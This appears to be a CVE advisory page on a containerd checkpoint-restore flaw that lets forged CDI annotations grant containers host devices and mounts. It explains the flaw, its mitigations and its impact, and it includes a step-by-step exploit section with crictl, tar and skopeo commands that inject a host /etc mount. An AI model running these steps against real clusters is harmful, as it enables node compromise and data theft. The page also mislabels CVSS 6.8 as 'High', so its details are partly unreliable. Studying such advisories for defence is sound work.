Listen to this Post
How CVE-2026-53492 Works
The containerd Container Runtime Interface (CRI) plugin implements container checkpoint and restore functionality, which allows saving a running container’s state to disk and later restoring it. During restore, containerd unpacks the checkpoint archive and reads metadata files such as `config.json` and annotation files directly into the container’s persistent state directory. The vulnerability arises because containerd blindly trusts CDI-related annotations (cdi.k8s.io/ and cdi.k8s.io) present in the checkpoint image metadata, rather than validating them against the pod’s original create-time specification. This trust assumption is dangerous because checkpoint images can be crafted by any user with pod creation permissions, and Kubernetes does not enforce CDI annotations as part of its standard resource allocation or device plugin admission control.
When a container is restored, containerd applies these smuggled CDI annotations to the new container instance. CDI annotations are used to request access to host devices, such as GPUs, network interfaces, or special-purpose hardware, and they can also specify host mount points. By injecting arbitrary CDI edits, an attacker can force the restored container to gain access to devices or host paths that were not originally allocated to the pod. For example, an attacker could add a device node for `/dev/sdb` or mount the host’s `/etc` directory, leading to data exfiltration or privilege escalation.
Successful exploitation requires several conditions: the Kubernetes node must have CDI enabled (i.e., containerd is configured with CDI support), and the host must contain a matching CDI specification file for the requested device in the default directories (/etc/cdi or /var/run/cdi). If CDI is disabled or no matching specification exists, the attack cannot proceed. The vulnerability affects all containerd versions from 2.1.0 up to (but not including) 2.1.9, 2.2.0 up to 2.2.5, and 2.3.0 up to 2.3.2. The flaw was discovered and responsibly disclosed by Robert Prast, and the containerd project has released patches in versions 2.1.9, 2.2.5, and 2.3.2 that filter out CDI annotations during checkpoint restore, preventing the smuggling attack.
DailyCVE Form:
Platform: containerd
Version: 2.1.0–2.3.1
Vulnerability: CDI annotation smuggling
Severity: High (CVSS 6.8)
Date: 2026-06-18
Prediction: Patch released 2026-06-18
What Undercode Say:
Analytics:
- CVE ID: CVE-2026-53492 (GHSA-33vj-92qq-66hc)
- CVSS Score: 6.8 (High) – Vector: AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N
- Affected Versions: containerd 2.1.0–2.1.8, 2.2.0–2.2.4, 2.3.0–2.3.1
- Patched Versions: 2.1.9, 2.2.5, 2.3.2
- Exploitation Requirements: CDI enabled on node + matching host CDI spec + user with pod creation permissions
- Attack Vector: Network (remote)
- Privileges Required: Low (pod creation)
- User Interaction: None
Bash Commands & Checks:
Check containerd version containerd --version Check if CDI is enabled in containerd config grep -i "enable_cdi" /etc/containerd/config.toml List existing CDI specifications on the node ls -la /etc/cdi/ /var/run/cdi/ Temporarily mitigate by relocating CDI specs (if CDI not needed) sudo mv /etc/cdi /etc/cdi.disabled sudo mv /var/run/cdi /var/run/cdi.disabled Verify patch status by checking for the fix commit Fix commit: 02045fd46 (cri: filter CDI annotations on checkpoint restore) git log --oneline | grep "filter CDI annotations" Restart containerd after mitigation sudo systemctl restart containerd
Exploit:
An attacker with pod creation permissions can craft a malicious checkpoint image containing forged CDI annotations. The attack steps are:
1. Create a benign container in a pod with a device allocation (e.g., a GPU).
2. Take a checkpoint of the container using crictl checkpoint <container-id>.
3. Modify the checkpoint archive – extract it, edit the `config.json` or annotation files to inject CDI annotations such as:
"annotations": {
"cdi.k8s.io/gpu": "nvidia.com/gpu=0",
"cdi.k8s.io/host-mount": "/host/etc:/container/etc"
}
4. Repack the archive and host it in a container registry as a checkpoint image.
5. Restore the container from the malicious checkpoint using `crictl restore` or via Kubernetes pod creation referencing the checkpoint image.
6. Upon restore, containerd applies the smuggled CDI annotations, granting the container unauthorized access to host devices or mounts.
Example crictl commands (illustrative):
Take checkpoint crictl checkpoint <container-id> /tmp/checkpoint.tar Modify checkpoint (extract, edit annotations, repack) tar -xf /tmp/checkpoint.tar vim config.json Add forged CDI annotations tar -cf malicious-checkpoint.tar Push to registry (requires registry access) skopeo copy oci:malicious-checkpoint.tar docker://registry.example.com/malicious:checkpoint Restore from malicious checkpoint (on another node or same node) crictl restore registry.example.com/malicious:checkpoint
Protection:
Immediate Actions:
- Upgrade containerd to the patched versions: 2.1.9, 2.2.5, or 2.3.2.
- Recreate containers that were restored from untrusted checkpoint images to remove smuggled configuration.
Workarounds (if upgrade is not immediately possible):
- Restrict checkpoint restore – only allow restore from trusted checkpoint images.
- Disable CDI on the node if not in use – remove or relocate CDI specification files from `/etc/cdi` and
/var/run/cdi. - Admission control – implement a Kubernetes admission webhook to block pods that request checkpoint restoration or contain suspicious CDI annotations.
Long-term Measures:
- Enable Pod Security Standards to restrict pod creation permissions.
- Use ImagePolicyWebhook to validate checkpoint images before they are pulled.
- Monitor audit logs for unexpected `crictl checkpoint` or `crictl restore` operations.
Impact:
- Bypass of Kubernetes Resource Allocation – An attacker can circumvent the device plugin and resource quota enforcement, gaining access to hardware devices (GPUs, FPGAs, etc.) that were not allocated to the pod.
- Host Mount Injection – Arbitrary host directories can be mounted into the container, leading to:
- Reading sensitive host files (e.g.,
/etc/kubernetes/pki,/var/lib/kubelet). - Writing malicious files or binaries to the host filesystem.
- Privilege Escalation – With access to host devices and mounts, an attacker can escalate privileges within the cluster or compromise the underlying node.
- Data Exfiltration – Sensitive data from the host or other pods can be accessed and exfiltrated.
- Cluster Compromise – In multi-tenant environments, this vulnerability can lead to full cluster takeover by a single malicious user with pod creation rights.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
